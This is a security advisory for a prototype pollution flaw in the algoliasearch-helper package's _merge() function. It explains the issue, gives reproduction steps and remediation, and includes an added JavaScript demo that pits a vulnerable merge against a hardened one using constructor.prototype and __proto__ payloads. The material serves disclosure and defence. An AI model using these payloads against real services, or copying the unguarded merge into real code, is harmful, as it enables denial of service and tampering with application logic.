Algolia Algoliasearch Helper Prototype Pollution Vulnerability

Vulnerability

A prototype pollution vulnerability has been identified in the Algolia algoliasearch-helper package, affecting versions from 2.0.0-rc1 up to, but not including, 3.11.2. The flaw is in the '_merge()' function in 'merge.js', which deep-merges user-supplied search parameters into the helper's state. The function recurses into a 'constructor' key and from there into its 'prototype' key, so a parameter object of the form {"constructor":{"prototype":{...}}} ends up merging attacker-chosen properties onto Object.prototype. The final assignment back to the read-only 'prototype' property throws a TypeError, but the nested properties have already been copied onto Object.prototype by the time that error is raised, so the pollution survives whenever the error is caught or otherwise tolerated. Note that prototype pollution injects properties, not code: whether it can be escalated to code execution depends on how the application later consumes the polluted properties. This issue is related to the previously reported CVE-2021-23433 in the same merge routine, but it is reached through a different key path.

Impact

Exploitation of this vulnerability lets an attacker add or overwrite properties on Object.prototype, which every ordinary object in the process then inherits. Depending on how the application reads those properties, the result ranges from denial of service (overwriting fundamental object attributes and triggering JavaScript exceptions) to manipulation of application logic, for instance by supplying defaults or options that code downstream treats as trusted. Where such a gadget exists, a polluted property can become a vector for executing attacker-controlled code. Because the prototype is shared process-wide, a single malicious search request can affect every subsequent request served by that process until it restarts.

Reproduction

The vulnerability can be reproduced with any 'algoliasearch-helper' release from 2.0.0-rc1 up to, but not including, 3.11.2. Build a JSON string whose top-level object contains a 'constructor' key with a nested 'prototype' object (for example {"constructor":{"prototype":{"polluted":"yes"}}}), parse it with JSON.parse so that 'constructor' becomes an own property, and pass the result as a search parameter so that it is merged through '_merge()' in 'merge.js'. The merge throws a TypeError when it tries to assign to the read-only 'prototype' property, but the nested property has already been written; if the error is caught, a subsequent check such as ({}).polluted returns "yes" from a freshly created object, confirming that Object.prototype was polluted. A payload using the '__proto__' key does not work in these versions, which is what distinguishes this issue from the earlier report.
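The following is an added example, not code from algoliasearch-helper or from the advisory. It reconstructs a recursive merge in the style of the helper's '_merge()' (the real source is not reproduced here), parameterised by the key names it refuses to merge, so that the bypass described above and its fix can be observed side by side. The "vulnerable" variant skips only '__proto__'; the "hardened" variant also skips 'constructor' and 'prototype'. That the 3.11.2 fix uses exactly these names is an assumption; the payloads, the 'pollutionProbe' helper and the 'hitsPerPage' default are constructed for the example.

```javascript
// Added example: reconstruction of a recursive deep merge in the style of
// algoliasearch-helper's _merge(), NOT the library's own source.
// blockedKeys lists the property names the merge refuses to descend into.
function isObjectOrArrayOrFunction(value) {
  return (
    typeof value === 'function' ||
    Array.isArray(value) ||
    Object.prototype.toString.call(value) === '[object Object]'
  );
}

function makeMerge(blockedKeys) {
  function clone(value) {
    if (typeof value === 'object' && value !== null) {
      return merge(Array.isArray(value) ? [] : {}, value);
    }
    return value;
  }

  function merge(target, source) {
    'use strict'; // strict mode makes the read-only write below throw instead of silently failing
    for (var key in source) {
      if (!Object.prototype.hasOwnProperty.call(source, key) || blockedKeys.indexOf(key) !== -1) {
        continue;
      }
      var sourceVal = source[key];
      var targetVal = target[key]; // for key 'constructor' on a plain object this is the inherited Object function

      if (isObjectOrArrayOrFunction(targetVal) && isObjectOrArrayOrFunction(sourceVal)) {
        // The recursive call runs first. When targetVal is Object.prototype it
        // copies the attacker's properties onto it; only afterwards does the
        // assignment Object['prototype'] = ... hit a read-only property and throw.
        target[key] = merge(targetVal, sourceVal);
      } else {
        target[key] = clone(sourceVal);
      }
    }
    return target;
  }

  return merge;
}

// Assumption: the pre-3.11.2 behaviour blocks only '__proto__'; the fix
// additionally blocks 'constructor' and 'prototype'.
var vulnerableMerge = makeMerge(['__proto__']);
var hardenedMerge = makeMerge(['__proto__', 'constructor', 'prototype']);

// Constructed payloads standing in for attacker-controlled search parameters.
var CONSTRUCTOR_PAYLOAD = '{"query":"shoes","constructor":{"prototype":{"polluted":"yes"}}}';
var PROTO_PAYLOAD = '{"query":"shoes","__proto__":{"polluted":"yes"}}';

// Merge a JSON payload into fresh defaults, the way user-supplied parameters
// are merged into a search state, catching the TypeError the way a
// request handler with a catch-all error path would. The probe then reads
// 'polluted' from a brand-new object: any value other than undefined can
// only have come from Object.prototype.
function pollutionProbe(mergeFn, payloadJson) {
  var params = JSON.parse(payloadJson); // 'constructor' / '__proto__' become own properties
  var result = { threw: false, leaked: undefined };
  try {
    mergeFn({ hitsPerPage: 20 }, params);
  } catch (e) {
    result.threw = e instanceof TypeError;
  }
  result.leaked = ({}).polluted;
  delete Object.prototype.polluted; // undo the pollution so the rest of the process is unaffected
  return result;
}

// Stand-alone run: prints { threw: true, leaked: 'yes' } for the first case,
// and { threw: false, leaked: undefined } for the other two.
console.log('vulnerable, constructor.prototype:', pollutionProbe(vulnerableMerge, CONSTRUCTOR_PAYLOAD));
console.log('vulnerable, __proto__ (blocked):  ', pollutionProbe(vulnerableMerge, PROTO_PAYLOAD));
console.log('hardened, constructor.prototype:  ', pollutionProbe(hardenedMerge, CONSTRUCTOR_PAYLOAD));
```

The first case is the advisory's point in miniature: the merge does throw, yet a fresh object already inherits 'polluted' when the error is caught. The probe's final 'delete' is only there to keep the example self-contained; in a real service nothing removes the property, so one request poisons every later one.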

Remediation

Users should upgrade to algoliasearch-helper version 3.11.2 or later, which addresses this vulnerability. Where an immediate upgrade is not possible, a general mitigation is to reject or strip search parameters whose keys include '__proto__', 'constructor' or 'prototype' before they reach the helper, and to restart any process in which pollution is suspected, since a polluted Object.prototype persists for the lifetime of the process.

Added: Sep 27, 2025, 5:17 AM
Updated: Sep 27, 2025, 5:17 AM

Vulnerability Rating (Custom Algorithm)

spread          4.2
impact          3.8
exploitability  6.0
remediation     7.7
relevance       0.6
threat          6.4
urgency         2.9
incentive       1.7

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.